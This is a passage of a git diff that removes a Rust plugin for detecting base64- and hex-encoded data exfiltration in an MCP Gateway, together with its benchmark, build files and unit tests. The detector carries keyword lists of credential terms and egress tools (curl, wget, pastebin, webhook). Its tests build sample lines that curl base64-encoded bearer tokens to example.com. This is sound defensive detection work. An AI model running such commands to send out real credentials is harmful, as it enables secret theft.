{'Impl':<10} {'Tasks':>6} {'Ops/sec':>12} {'Total':>8} {'Duration':>10}") - print(f" {'─' * 56}") - for r in results: - print(f" {r.implementation:<10} {r.tasks:>6} {r.ops_per_sec:>11.1f} {r.total_ops:>8} {r.duration_sec:>9.3f}s") - - -# --------------------------------------------------------------------------- -# Main -# --------------------------------------------------------------------------- - -async def main() -> None: - """Run the benchmark.""" - parser = argparse.ArgumentParser(description="Encoded exfil detection: Python vs Rust performance comparison") - parser.add_argument("--mode", choices=["latency", "throughput"], default="latency", help="Benchmark mode") - parser.add_argument("--iterations", type=int, default=1000, help="Iterations per scenario (latency mode)") - parser.add_argument("--warmup", type=int, default=100, help="Warmup iterations (latency mode)") - parser.add_argument("--concurrency", type=int, nargs="+", default=[1, 4, 16, 64], help="Concurrency levels (throughput mode)") - parser.add_argument("--ops-per-task", type=int, default=200, help="Operations per async task (throughput mode)") - parser.add_argument("--scenarios", nargs="+", default=None, help="Run only named scenarios") - args = parser.parse_args() - - if not _RUST_AVAILABLE: - print("ERROR: Rust encoded exfil module not available.") - print(" Run: uv pip install -e plugins_rust/encoded_exfil_detection/") - sys.exit(1) - - scenarios = SCENARIOS - if args.scenarios: - scenarios = [s for s in SCENARIOS if s.name in args.scenarios] - if not scenarios: - print(f"No matching scenarios. Available: {[s.name for s in SCENARIOS]}") - sys.exit(1) - - print(f"\nEncoded Exfil Detection — Python vs Rust ({args.mode} mode)") - print(f"{'─' * 60}") - - # Parity checks - print("\nParity smoke tests:") - for scenario in scenarios: - await _parity_check(scenario) - print("All parity checks passed.\n") - - if args.mode == "latency": - print(f"Iterations: {args.iterations} (warmup: {args.warmup})") - for scenario in scenarios: - py_result, rs_result = await _bench_latency(scenario, args.iterations, args.warmup) - _print_latency_table(scenario, py_result, rs_result) - - else: # throughput - print(f"Ops/task: {args.ops_per_task}, concurrency: {args.concurrency}") - for scenario in scenarios: - results = await _bench_throughput(scenario, args.concurrency, args.ops_per_task) - _print_throughput_table(scenario, results) - - print(f"\n{'=' * 72}") - print(" Done.") - - -if __name__ == "__main__": - asyncio.run(main()) diff --git a/plugins_rust/encoded_exfil_detection/deny.toml b/plugins_rust/encoded_exfil_detection/deny.toml deleted file mode 100644 index 142f5157ff..0000000000 --- a/plugins_rust/encoded_exfil_detection/deny.toml +++ /dev/null @@ -1,27 +0,0 @@ -# Cargo-deny config: license and policy checks for this crate. -# See https://embarkstudios.github.io/cargo-deny/ - -[licenses] -unused-allowed-license = "allow" -confidence-threshold = 0.95 -allow = [ - # Currently used across our Rust projects - "Apache-2.0", - "BSD-2-Clause", - "BSD-3-Clause", - "BSL-1.0", - "CC0-1.0", - "ISC", - "LGPL-2.1-or-later", - "MIT", - "MIT-0", - "OpenSSL", - "Unicode-3.0", - "Unicode-DFS-2016", - "Unlicense", - "Zlib", - # Common safe licenses in the Rust ecosystem - "0BSD", - "Apache-2.0 WITH LLVM-exception", - "Unicode-DFS-2015", -] diff --git a/plugins_rust/encoded_exfil_detection/pyproject.toml b/plugins_rust/encoded_exfil_detection/pyproject.toml deleted file mode 100644 index f4fddf7a68..0000000000 --- a/plugins_rust/encoded_exfil_detection/pyproject.toml +++ /dev/null @@ -1,22 +0,0 @@ -[build-system] -requires = ["maturin>=1.4,<2.0"] -build-backend = "maturin" - -[project] -name = "mcpgateway-encoded-exfil-detection" -version = "1.0.0-RC-1" -description = "High-performance encoded exfiltration detection library for MCP Gateway" -authors = [{ name = "MCP Gateway Contributors" }] -license = { text = "Apache-2.0" } -requires-python = ">=3.11" -classifiers = [ - "Programming Language :: Rust", - "Programming Language :: Python :: Implementation :: CPython", - "Programming Language :: Python :: 3.11", - "Programming Language :: Python :: 3.12", -] - -[tool.maturin] -module-name = "encoded_exfil_detection_rust" -python-source = "python" -features = ["pyo3/extension-module"] diff --git a/plugins_rust/encoded_exfil_detection/python/encoded_exfil_detection_rust/__init__.pyi b/plugins_rust/encoded_exfil_detection/python/encoded_exfil_detection_rust/__init__.pyi deleted file mode 100644 index 93e144b9d4..0000000000 --- a/plugins_rust/encoded_exfil_detection/python/encoded_exfil_detection_rust/__init__.pyi +++ /dev/null @@ -1,11 +0,0 @@ -# This file is automatically generated by pyo3_stub_gen -# ruff: noqa: E501, F401, F403, F405 - -import builtins -import typing - -__all__ = [ - "py_scan_container", -] - -def py_scan_container(container: typing.Any, config: typing.Any) -> tuple[builtins.int, typing.Any, list]: ... diff --git a/plugins_rust/encoded_exfil_detection/src/bin/stub_gen.rs b/plugins_rust/encoded_exfil_detection/src/bin/stub_gen.rs deleted file mode 100644 index 780461d1a0..0000000000 --- a/plugins_rust/encoded_exfil_detection/src/bin/stub_gen.rs +++ /dev/null @@ -1,19 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 -// -// Stub file generator for encoded_exfil_detection module -// -// This binary generates Python type stub files (.pyi) for the encoded_exfil_detection module. -// Run with: cargo run --bin stub_gen - -use encoded_exfil_detection_rust::stub_info; - -fn main() { - // Get stub info (returns Result) - let stub_info = stub_info().expect("Failed to get stub info"); - - // Generate stub files - paths are determined from pyproject.toml - stub_info.generate().expect("Failed to generate stub file"); - - println!("✓ Generated stub files successfully"); -} diff --git a/plugins_rust/encoded_exfil_detection/src/lib.rs b/plugins_rust/encoded_exfil_detection/src/lib.rs deleted file mode 100644 index 4706928f7e..0000000000 --- a/plugins_rust/encoded_exfil_detection/src/lib.rs +++ /dev/null @@ -1,987 +0,0 @@ -use base64::Engine; -use base64::engine::general_purpose::{STANDARD, URL_SAFE}; -use pyo3::prelude::*; -use pyo3::types::{PyAny, PyDict, PyList, PyString}; -use pyo3_stub_gen::define_stub_info_gatherer; -use pyo3_stub_gen::derive::*; -use regex::Regex; -use std::collections::HashMap; -use std::sync::LazyLock; - -static BASE64_RE: LazyLock = LazyLock::new(|| { - // Match base64: alphanumeric+/+ with optional padding - // Match core pattern only; validate boundaries in code to avoid consuming adjacent matches - Regex::new(r"[A-Za-z0-9+/]{16,}={0,2}").expect("failed to compile BASE64_RE") -}); - -static BASE64URL_RE: LazyLock = LazyLock::new(|| { - // Match base64url: alphanumeric with - and _ instead of + and / - // Match core pattern only; validate boundaries in code to avoid consuming adjacent matches - Regex::new(r"[A-Za-z0-9_\-]{16,}={0,2}").expect("failed to compile BASE64URL_RE") -}); - -static HEX_RE: LazyLock = LazyLock::new(|| { - // Match core pattern only; validate boundaries in code to avoid consuming adjacent matches - Regex::new(r"[A-Fa-f0-9]{24,}").expect("failed to compile HEX_RE") -}); - -static PERCENT_RE: LazyLock = - LazyLock::new(|| Regex::new(r"(?:%[0-9A-Fa-f]{2}){8,}").expect("failed to compile PERCENT_RE")); - -static ESCAPED_HEX_RE: LazyLock = LazyLock::new(|| { - Regex::new(r"(?:\\x[0-9A-Fa-f]{2}){8,}").expect("failed to compile ESCAPED_HEX_RE") -}); - -const SENSITIVE_KEYWORDS: &[&[u8]] = &[ - b"password", - b"passwd", - b"secret", - b"token", - b"api_key", - b"apikey", - b"authorization", - b"bearer", - b"cookie", - b"session", - b"private key", - b"ssh-rsa", - b"refresh_token", - b"client_secret", -]; - -const EGRESS_HINTS: &[&str] = &[ - "curl", "wget", "http://", "https://", "upload", "webhook", "beacon", "dns", "exfil", - "pastebin", "socket", "send", -]; - -#[derive(Clone, Debug)] -struct DetectorConfig { - enabled: HashMap, - min_encoded_length: usize, - min_decoded_length: usize, - min_entropy: f64, - min_printable_ratio: f64, - min_suspicion_score: u32, - max_scan_string_length: usize, - max_findings_per_value: usize, - redact: bool, - redaction_text: String, - allowlist_patterns: Vec, - extra_sensitive_keywords: Vec>, - extra_egress_hints: Vec, - max_decode_depth: usize, - max_recursion_depth: usize, - per_encoding_score: HashMap, - parse_json_strings: bool, -} - -impl Default for DetectorConfig { - fn default() -> Self { - let mut enabled = HashMap::new(); - enabled.insert("base64".to_string(), true); - enabled.insert("base64url".to_string(), true); - enabled.insert("hex".to_string(), true); - enabled.insert("percent_encoding".to_string(), true); - enabled.insert("escaped_hex".to_string(), true); - - Self { - enabled, - min_encoded_length: 24, - min_decoded_length: 12, - min_entropy: 3.3, - min_printable_ratio: 0.70, - min_suspicion_score: 3, - max_scan_string_length: 200_000, - max_findings_per_value: 50, - redact: false, - redaction_text: "***ENCODED_REDACTED***".to_string(), - allowlist_patterns: Vec::new(), - extra_sensitive_keywords: Vec::new(), - extra_egress_hints: Vec::new(), - max_decode_depth: 2, - max_recursion_depth: 32, - per_encoding_score: HashMap::new(), - parse_json_strings: true, - } - } -} - -impl<'py> TryFrom<&Bound<'py, PyAny>> for DetectorConfig { - type Error = PyErr; - - fn try_from(obj: &Bound<'py, PyAny>) -> PyResult { - let default = DetectorConfig::default(); - - let enabled = obj - .getattr("enabled") - .ok() - .and_then(|v| v.extract::>().ok()) - .unwrap_or(default.enabled.clone()); - - let min_encoded_length = obj - .getattr("min_encoded_length") - .ok() - .and_then(|v| v.extract::().ok()) - .unwrap_or(default.min_encoded_length); - - let min_decoded_length = obj - .getattr("min_decoded_length") - .ok() - .and_then(|v| v.extract::().ok()) - .unwrap_or(default.min_decoded_length); - - let min_entropy = obj - .getattr("min_entropy") - .ok() - .and_then(|v| v.extract::().ok()) - .unwrap_or(default.min_entropy); - - let min_printable_ratio = obj - .getattr("min_printable_ratio") - .ok() - .and_then(|v| v.extract::().ok()) - .unwrap_or(default.min_printable_ratio); - - let min_suspicion_score = obj - .getattr("min_suspicion_score") - .ok() - .and_then(|v| v.extract::().ok()) - .unwrap_or(default.min_suspicion_score); - - let max_scan_string_length = obj - .getattr("max_scan_string_length") - .ok() - .and_then(|v| v.extract::().ok()) - .unwrap_or(default.max_scan_string_length); - - let max_findings_per_value = obj - .getattr("max_findings_per_value") - .ok() - .and_then(|v| v.extract::().ok()) - .unwrap_or(default.max_findings_per_value); - - let redact = obj - .getattr("redact") - .ok() - .and_then(|v| v.extract::().ok()) - .unwrap_or(default.redact); - - let redaction_text = obj - .getattr("redaction_text") - .ok() - .and_then(|v| v.extract::().ok()) - .unwrap_or(default.redaction_text.clone()); - - let allowlist_raw: Vec = obj - .getattr("allowlist_patterns") - .ok() - .and_then(|v| v.extract::>().ok()) - .unwrap_or_default(); - let mut allowlist_patterns = Vec::with_capacity(allowlist_raw.len()); - for pattern in &allowlist_raw { - match Regex::new(pattern) { - Ok(re) => allowlist_patterns.push(re), - Err(e) => { - return Err(pyo3::exceptions::PyValueError::new_err(format!( - "Invalid allowlist regex pattern '{}': {}", - pattern, e - ))); - } - } - } - - let extra_sensitive_keywords = obj - .getattr("extra_sensitive_keywords") - .ok() - .and_then(|v| v.extract::>().ok()) - .unwrap_or_default() - .into_iter() - .map(|kw| kw.to_lowercase().into_bytes()) - .collect(); - - let extra_egress_hints = obj - .getattr("extra_egress_hints") - .ok() - .and_then(|v| v.extract::>().ok()) - .unwrap_or_default() - .into_iter() - .map(|h| h.to_lowercase()) - .collect(); - - let max_decode_depth = obj - .getattr("max_decode_depth") - .ok() - .and_then(|v| v.extract::().ok()) - .unwrap_or(default.max_decode_depth); - - let max_recursion_depth = obj - .getattr("max_recursion_depth") - .ok() - .and_then(|v| v.extract::().ok()) - .unwrap_or(default.max_recursion_depth); - - let per_encoding_score = obj - .getattr("per_encoding_score") - .ok() - .and_then(|v| v.extract::>().ok()) - .unwrap_or_default(); - - let parse_json_strings = obj - .getattr("parse_json_strings") - .ok() - .and_then(|v| v.extract::().ok()) - .unwrap_or(default.parse_json_strings); - - Ok(Self { - enabled, - min_encoded_length, - min_decoded_length, - min_entropy, - min_printable_ratio, - min_suspicion_score, - max_scan_string_length, - max_findings_per_value, - redact, - redaction_text, - allowlist_patterns, - extra_sensitive_keywords, - extra_egress_hints, - max_decode_depth, - max_recursion_depth, - per_encoding_score, - parse_json_strings, - }) - } -} - -#[derive(Clone, Debug)] -struct Finding { - encoding: String, - path: String, - start: usize, - end: usize, - score: u32, - entropy: f64, - decoded_len: usize, - printable_ratio: f64, - reason: Vec, - matched_preview: String, -} - -fn normalize_padding(candidate: &str) -> String { - let remainder = candidate.len() % 4; - if remainder == 0 { - return candidate.to_string(); - } - format!("{}{}", candidate, "=".repeat(4 - remainder)) -} - -fn decode_percent(candidate: &str) -> Option> { - let bytes = candidate.as_bytes(); - let mut out = Vec::with_capacity(bytes.len() / 3); - let mut i = 0; - - while i < bytes.len() { - if bytes[i] != b'%' || i + 2 >= bytes.len() { - return None; - } - - let hi = (bytes[i + 1] as char).to_digit(16)?; - let lo = (bytes[i + 2] as char).to_digit(16)?; - out.push(((hi << 4) + lo) as u8); - i += 3; - } - - Some(out) -} - -fn decode_escaped_hex(candidate: &str) -> Option> { - let bytes = candidate.as_bytes(); - let mut out = Vec::with_capacity(bytes.len() / 4); - let mut i = 0; - - while i < bytes.len() { - if i + 3 >= bytes.len() || bytes[i] != b'\\' || bytes[i + 1] != b'x' { - return None; - } - - let hi = (bytes[i + 2] as char).to_digit(16)?; - let lo = (bytes[i + 3] as char).to_digit(16)?; - out.push(((hi << 4) + lo) as u8); - i += 4; - } - - Some(out) -} - -fn decode_candidate(encoding: &str, candidate: &str) -> Option> { - match encoding { - "base64" => STANDARD.decode(normalize_padding(candidate)).ok(), - "base64url" => URL_SAFE.decode(normalize_padding(candidate)).ok(), - "hex" => { - if !candidate.len().is_multiple_of(2) { - return None; - } - let mut out = Vec::with_capacity(candidate.len() / 2); - let bytes = candidate.as_bytes(); - let mut i = 0; - while i < bytes.len() { - let hi = (bytes[i] as char).to_digit(16)?; - let lo = (bytes[i + 1] as char).to_digit(16)?; - out.push(((hi << 4) + lo) as u8); - i += 2; - } - Some(out) - } - "percent_encoding" => decode_percent(candidate), - "escaped_hex" => decode_escaped_hex(candidate), - _ => None, - } -} - -fn shannon_entropy(data: &[u8]) -> f64 { - if data.is_empty() { - return 0.0; - } - - let mut counts = [0usize; 256]; - for byte in data { - counts[*byte as usize] += 1; - } - - let total = data.len() as f64; - let mut entropy = 0.0; - - for count in counts { - if count == 0 { - continue; - } - let probability = count as f64 / total; - entropy -= probability * probability.log2(); - } - - entropy -} - -fn printable_ratio(data: &[u8]) -> f64 { - if data.is_empty() { - return 0.0; - } - - let printable = data - .iter() - .filter(|byte| { - (32..=126).contains(*byte) || **byte == b'\n' || **byte == b'\r' || **byte == b'\t' - }) - .count(); - - printable as f64 / data.len() as f64 -} - -fn has_sensitive_keywords(decoded: &[u8], extra_keywords: &[Vec]) -> bool { - let lowered = decoded - .iter() - .map(|byte| byte.to_ascii_lowercase()) - .collect::>(); - - let builtin_match = SENSITIVE_KEYWORDS.iter().any(|keyword| { - lowered - .windows(keyword.len()) - .any(|window| window == *keyword) - }); - if builtin_match { - return true; - } - extra_keywords.iter().any(|keyword| { - if keyword.is_empty() { - return false; - } - lowered - .windows(keyword.len()) - .any(|window| window == keyword.as_slice()) - }) -} - -fn has_egress_context(text: &str, start: usize, end: usize, extra_hints: &[String]) -> bool { - let lower = text.to_lowercase(); - let bytes = lower.as_bytes(); - let left = start.saturating_sub(80); - let right = (end + 80).min(bytes.len()); - let window = String::from_utf8_lossy(&bytes[left..right]); - if EGRESS_HINTS.iter().any(|hint| window.contains(hint)) { - return true; - } - extra_hints - .iter() - .any(|hint| !hint.is_empty() && window.contains(hint.as_str())) -} - -/// Validate that a match has proper word boundaries (not part of a larger alphanumeric sequence) -/// This prevents false positives and allows adjacent matches without consuming boundary chars -fn has_valid_boundaries(text: &str, start: usize, end: usize, core_chars: &str) -> bool { - let bytes = text.as_bytes(); - // Exclude '=' from boundary check — it's only valid as padding at the end of base64, - // and the regex already captures trailing padding as part of the match. - let boundary_chars = core_chars.replace('=', ""); - - // Check character before match (if exists) - if start > 0 { - let prev_char = bytes[start - 1] as char; - if boundary_chars.contains(prev_char) { - return false; - } - } - - // Check character after match (if exists) - if end < bytes.len() { - let next_char = bytes[end] as char; - if boundary_chars.contains(next_char) { - return false; - } - } - - true -} - -fn evaluate_candidate( - text: &str, - path: &str, - encoding: &str, - candidate: &str, - start: usize, - end: usize, - cfg: &DetectorConfig, -) -> Option { - if candidate.len() < cfg.min_encoded_length { - return None; - } - - let decoded = decode_candidate(encoding, candidate)?; - if decoded.len() < cfg.min_decoded_length { - return None; - } - - let entropy = shannon_entropy(&decoded); - let printable = printable_ratio(&decoded); - let sensitive_hit = has_sensitive_keywords(&decoded, &cfg.extra_sensitive_keywords); - let egress_hit = has_egress_context(text, start, end, &cfg.extra_egress_hints); - - let mut score = 1u32; - let mut reasons = vec!["decodable".to_string()]; - - if entropy >= cfg.min_entropy { - score += 1; - reasons.push("high_entropy".to_string()); - } - - if printable >= cfg.min_printable_ratio { - score += 1; - reasons.push("printable_payload".to_string()); - } - - if sensitive_hit { - score += 2; - reasons.push("sensitive_keywords".to_string()); - } - - if egress_hit { - score += 1; - reasons.push("egress_context".to_string()); - } - - if candidate.len() >= cfg.min_encoded_length * 2 { - score += 1; - reasons.push("long_segment".to_string()); - } - - let threshold = cfg - .per_encoding_score - .get(encoding) - .copied() - .unwrap_or(cfg.min_suspicion_score); - if score < threshold { - return None; - } - - let matched_preview = if candidate.len() > 24 { - format!("{}…", &candidate[..24]) - } else { - candidate.to_string() - }; - - Some(Finding { - encoding: encoding.to_string(), - path: if path.is_empty() { - "$".to_string() - } else { - path.to_string() - }, - start, - end, - score, - entropy, - decoded_len: decoded.len(), - printable_ratio: printable, - reason: reasons, - matched_preview, - }) -} - -fn apply_redactions(text: &str, findings: &[Finding], replacement: &str) -> String { - let mut spans = findings - .iter() - .map(|finding| (finding.start, finding.end)) - .collect::>(); - spans.sort_unstable(); - spans.dedup(); - - let mut redacted = text.to_string(); - for (start, end) in spans.into_iter().rev() { - redacted.replace_range(start..end, replacement); - } - - redacted -} - -fn scan_text( - text: &str, - path: &str, - cfg: &DetectorConfig, - decode_depth: usize, -) -> (String, Vec) { - if text.is_empty() || text.len() > cfg.max_scan_string_length { - return (text.to_string(), vec![]); - } - - let mut findings_by_span: HashMap<(usize, usize), Finding> = HashMap::new(); - - let detectors: [(&str, &Regex); 5] = [ - ("base64", &BASE64_RE), - ("base64url", &BASE64URL_RE), - ("hex", &HEX_RE), - ("percent_encoding", &PERCENT_RE), - ("escaped_hex", &ESCAPED_HEX_RE), - ]; - - for (encoding, regex) in detectors { - if !cfg.enabled.get(encoding).copied().unwrap_or(true) { - continue; - } - - // Define valid characters for each encoding to validate boundaries - let valid_chars = match encoding { - "base64" => "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", - "base64url" => "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-=", - "hex" => "ABCDEFabcdef0123456789", - _ => "", // percent_encoding and escaped_hex don't need boundary validation - }; - - for matched in regex.find_iter(text) { - let start = matched.start(); - let end = matched.end(); - let candidate = matched.as_str(); - - // Validate boundaries for encodings that need it - if !valid_chars.is_empty() && !has_valid_boundaries(text, start, end, valid_chars) { - continue; - } - - // Check allowlist — skip candidates matching any allowlist pattern - if cfg - .allowlist_patterns - .iter() - .any(|ap| ap.is_match(candidate)) - { - continue; - } - - let mut finding = evaluate_candidate(text, path, encoding, candidate, start, end, cfg); - - // Try nested decoding — peel encoding layers to find deeper secrets - if decode_depth < cfg.max_decode_depth.saturating_sub(1) - && let Some(decoded) = decode_candidate(encoding, candidate) - && decoded.len() >= cfg.min_decoded_length - { - let decoded_text = String::from_utf8_lossy(&decoded); - let (_, nested_findings) = scan_text(&decoded_text, path, cfg, decode_depth + 1); - for nf in nested_findings { - let use_nested = match &finding { - Some(f) => nf.score > f.score, - None => true, - }; - if use_nested { - finding = Some(Finding { start, end, ..nf }); - } - } - } - - if let Some(f) = finding { - let key = (f.start, f.end); - match findings_by_span.get(&key) { - Some(existing) if existing.score >= f.score => {} - _ => { - findings_by_span.insert(key, f); - } - } - - if findings_by_span.len() >= cfg.max_findings_per_value { - break; - } - } - } - } - - let mut findings = findings_by_span.into_values().collect::>(); - findings.sort_by_key(|item| (item.start, item.end)); - - if !cfg.redact || findings.is_empty() { - return (text.to_string(), findings); - } - - ( - apply_redactions(text, &findings, &cfg.redaction_text), - findings, - ) -} - -fn json_value_to_py<'py>(py: Python<'py>, val: &serde_json::Value) -> PyResult> { - match val { - serde_json::Value::String(s) => Ok(PyString::new(py, s).into_any()), - serde_json::Value::Object(map) => { - let dict = PyDict::new(py); - for (k, v) in map { - dict.set_item(k, json_value_to_py(py, v)?)?; - } - Ok(dict.into_any()) - } - serde_json::Value::Array(arr) => { - let list = PyList::empty(py); - for v in arr { - list.append(json_value_to_py(py, v)?)?; - } - Ok(list.into_any()) - } - serde_json::Value::Number(n) => { - if let Some(i) = n.as_i64() { - Ok(i.into_pyobject(py)?.into_any()) - } else if let Some(f) = n.as_f64() { - Ok(f.into_pyobject(py)?.into_any()) - } else { - Ok(py.None().into_bound(py).into_any()) - } - } - serde_json::Value::Bool(b) => Ok(b.into_pyobject(py)?.to_owned().into_any()), - serde_json::Value::Null => Ok(py.None().into_bound(py).into_any()), - } -} - -fn finding_to_dict<'py>(py: Python<'py>, finding: &Finding) -> PyResult> { - let finding_dict = PyDict::new(py); - finding_dict.set_item("type", "encoded_exfiltration")?; - finding_dict.set_item("encoding", &finding.encoding)?; - finding_dict.set_item("path", &finding.path)?; - finding_dict.set_item("start", finding.start)?; - finding_dict.set_item("end", finding.end)?; - finding_dict.set_item("score", finding.score)?; - finding_dict.set_item("entropy", (finding.entropy * 1000.0).round() / 1000.0)?; - finding_dict.set_item("decoded_len", finding.decoded_len)?; - finding_dict.set_item( - "printable_ratio", - (finding.printable_ratio * 1000.0).round() / 1000.0, - )?; - finding_dict.set_item("reason", &finding.reason)?; - finding_dict.set_item("match", &finding.matched_preview)?; - Ok(finding_dict) -} - -fn scan_container<'py>( - py: Python<'py>, - container: &Bound<'py, PyAny>, - path: &str, - cfg: &DetectorConfig, - depth: usize, -) -> PyResult<(usize, Bound<'py, PyAny>, Bound<'py, PyList>)> { - if depth > cfg.max_recursion_depth { - return Ok((0, container.clone(), PyList::empty(py))); - } - - if let Ok(text) = container.extract::() { - // Scan as raw text first — always returns the original type (string) - let (redacted_text, findings) = scan_text(&text, path, cfg, 0); - let findings_list = PyList::empty(py); - for finding in &findings { - findings_list.append(finding_to_dict(py, finding)?)?; - } - - // Try parsing string as JSON for additional findings (metadata only, no type mutation) - // Heuristic: only attempt JSON parse if string starts with { or [ and is within size limit - if cfg.parse_json_strings - && depth < cfg.max_recursion_depth - && text.len() <= cfg.max_scan_string_length - && text.len() >= 2 - && (text.starts_with('{') || text.starts_with('[')) - && let Ok(parsed) = serde_json::from_str::(&text) - && (parsed.is_object() || parsed.is_array()) - { - let json_path = if path.is_empty() { - "(json)".to_string() - } else { - format!("{}(json)", path) - }; - let py_parsed = json_value_to_py(py, &parsed)?; - let (_, _, json_findings) = scan_container(py, &py_parsed, &json_path, cfg, depth + 1)?; - // Deduplicate: only add JSON findings whose encoded match isn't already in raw scan - let raw_matches: std::collections::HashSet = - findings.iter().map(|f| f.matched_preview.clone()).collect(); - for item in json_findings.iter() { - if let Ok(dict) = item.cast::() { - let preview = dict - .get_item("match") - .ok() - .flatten() - .and_then(|v| v.extract::().ok()) - .unwrap_or_default(); - if !raw_matches.contains(&preview) { - findings_list.append(item)?; - } - } - } - } - - let total_findings = findings_list.len(); - return Ok(( - total_findings, - PyString::new(py, &redacted_text).into_any(), - findings_list, - )); - } - - if let Ok(dict) = container.cast::() { - let new_dict = PyDict::new(py); - let all_findings = PyList::empty(py); - let mut total = 0usize; - - for (key, value) in dict.iter() { - let key_str = key.str()?.to_string_lossy().into_owned(); - let child_path = if path.is_empty() { - key_str.clone() - } else { - format!("{}.{}", path, key_str) - }; - - // Scan keys that are long enough to contain encoded content - if key_str.len() >= cfg.min_encoded_length { - let key_path = format!("{}(key)", child_path); - let (_, key_findings) = scan_text(&key_str, &key_path, cfg, 0); - for kf in &key_findings { - all_findings.append(finding_to_dict(py, kf)?)?; - } - total += key_findings.len(); - } - - let (count, redacted_value, child_findings) = - scan_container(py, &value, &child_path, cfg, depth + 1)?; - total += count; - for item in child_findings.iter() { - all_findings.append(item)?; - } - new_dict.set_item(key, redacted_value)?; - } - - return Ok((total, new_dict.into_any(), all_findings)); - } - - if let Ok(list) = container.cast::() { - let new_list = PyList::empty(py); - let all_findings = PyList::empty(py); - let mut total = 0usize; - - for (index, item) in list.iter().enumerate() { - let child_path = if path.is_empty() { - format!("[{}]", index) - } else { - format!("{}[{}]", path, index) - }; - let (count, redacted_item, child_findings) = - scan_container(py, &item, &child_path, cfg, depth + 1)?; - total += count; - for finding in child_findings.iter() { - all_findings.append(finding)?; - } - new_list.append(redacted_item)?; - } - - return Ok((total, new_list.into_any(), all_findings)); - } - - Ok((0, container.clone(), PyList::empty(py))) -} - -/// Persistent engine that parses config once at init and reuses it across scans. -#[gen_stub_pyclass] -#[pyclass] -struct ExfilDetectorEngine { - cfg: DetectorConfig, -} - -#[gen_stub_pymethods] -#[pymethods] -impl ExfilDetectorEngine { - #[new] - fn new(config: Bound<'_, PyAny>) -> PyResult { - let cfg = DetectorConfig::try_from(&config)?; - Ok(Self { cfg }) - } - - /// Scan a container using the pre-parsed config. No per-call config parsing. - fn scan<'py>( - &self, - py: Python<'py>, - container: Bound<'py, PyAny>, - ) -> PyResult<(usize, Bound<'py, PyAny>, Bound<'py, PyList>)> { - scan_container(py, &container, "", &self.cfg, 0) - } -} - -/// Backward-compatible bare function — creates a temporary engine per call. -#[gen_stub_pyfunction] -#[pyfunction] -fn py_scan_container<'py>( - py: Python<'py>, - container: Bound<'py, PyAny>, - config: Bound<'py, PyAny>, -) -> PyResult<(usize, Bound<'py, PyAny>, Bound<'py, PyList>)> { - let cfg = DetectorConfig::try_from(&config)?; - scan_container(py, &container, "", &cfg, 0) -} - -#[pymodule] -fn encoded_exfil_detection_rust(m: &Bound<'_, PyModule>) -> PyResult<()> { - m.add_class::()?; - m.add_function(wrap_pyfunction!(py_scan_container, m)?)?; - Ok(()) -} - -// Define stub info gatherer for generating Python type stubs -define_stub_info_gatherer!(stub_info); - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_scan_text_detects_base64_sensitive_payload() { - let cfg = DetectorConfig::default(); - let encoded = STANDARD.encode(b"authorization: bearer abcdefghijklmnop"); - let text = format!("curl -d '{}' https://example.com", encoded); - let (_, findings) = scan_text(&text, "args.payload", &cfg, 0); - - assert_eq!(findings.len(), 1); - assert_eq!(findings[0].encoding, "base64"); - assert!(findings[0].score >= cfg.min_suspicion_score); - } - - #[test] - fn test_scan_text_redacts_when_enabled() { - let cfg = DetectorConfig { - redact: true, - redaction_text: "[REDACTED]".to_string(), - ..DetectorConfig::default() - }; - - let encoded = STANDARD.encode(b"password=my-secret-value"); - let text = format!("data={}", encoded); - let (redacted, findings) = scan_text(&text, "", &cfg, 0); - - assert_eq!(findings.len(), 1); - assert!(redacted.contains("[REDACTED]")); - assert!(!redacted.contains(&encoded)); - } - - #[test] - fn test_scan_text_ignores_short_candidates() { - let cfg = DetectorConfig::default(); - let text = "token=YWJjZA=="; - let (_, findings) = scan_text(text, "", &cfg, 0); - assert!(findings.is_empty()); - } - - #[test] - fn test_scan_text_detects_adjacent_matches() { - // Test that adjacent base64 strings are both detected (boundary chars not consumed) - let cfg = DetectorConfig::default(); - let encoded1 = STANDARD.encode(b"password=secret-value-one"); - let encoded2 = STANDARD.encode(b"token=secret-value-two"); - let text = format!("[{}] [{}]", encoded1, encoded2); - let (_, findings) = scan_text(&text, "", &cfg, 0); - - // Both base64 strings should be detected - assert_eq!( - findings.len(), - 2, - "Expected 2 findings for adjacent base64 strings" - ); - - // Verify they are distinct matches - assert_ne!(findings[0].start, findings[1].start); - assert_ne!(findings[0].end, findings[1].end); - } - - #[test] - fn test_nested_base64_detection() { - let inner = STANDARD.encode(b"password=super-secret-credential-value"); - let outer = STANDARD.encode(inner.as_bytes()); - let cfg = DetectorConfig { - max_decode_depth: 2, - min_suspicion_score: 4, - ..DetectorConfig::default() - }; - let (_, findings) = scan_text(&outer, "", &cfg, 0); - assert!( - !findings.is_empty(), - "Double-encoded base64 should be detected" - ); - assert!( - findings - .iter() - .any(|f| f.reason.contains(&"sensitive_keywords".to_string())), - "Inner layer sensitive_keywords should be found" - ); - } - - #[test] - fn test_allowlist_skips_matching_candidate() { - let encoded = STANDARD.encode(b"authorization: bearer super-secret-token-value"); - let cfg = DetectorConfig { - allowlist_patterns: vec![Regex::new(&encoded[..16]).unwrap()], - ..DetectorConfig::default() - }; - let text = format!("curl -d '{}' https://example.com", encoded); - let (_, findings) = scan_text(&text, "", &cfg, 0); - assert!( - findings.is_empty(), - "Allowlisted pattern should not produce findings" - ); - } - - #[test] - fn test_extra_sensitive_keywords() { - let encoded = STANDARD.encode(b"watsonx_cred=xq7m9Rk2vLpN3wJfHbYd8sTc"); - let cfg = DetectorConfig { - extra_sensitive_keywords: vec![b"watsonx_cred".to_vec()], - min_suspicion_score: 1, - ..DetectorConfig::default() - }; - let (_, findings) = scan_text(&encoded, "", &cfg, 0); - assert!( - !findings.is_empty(), - "Extra keyword should trigger detection" - ); - assert!( - findings - .iter() - .any(|f| f.reason.contains(&"sensitive_keywords".to_string())), - "sensitive_keywords reason should be present" - ); - } -} diff --git a/plugins_rust/pii_filter/Cargo.lock b/plugins_rust/pii_filter/Cargo.lock deleted file mode 100644 index 78b7f86af3..0000000000 --- a/plugins_rust/pii_filter/Cargo.lock +++ /dev/null @@ -1,1516 +0,0 @@ -# This file is automatically @generated by Cargo. -# It is not intended for manual editing. -version = 4 - -[[package]] -name = "aho-corasick" -version = "1.1.4" -source = 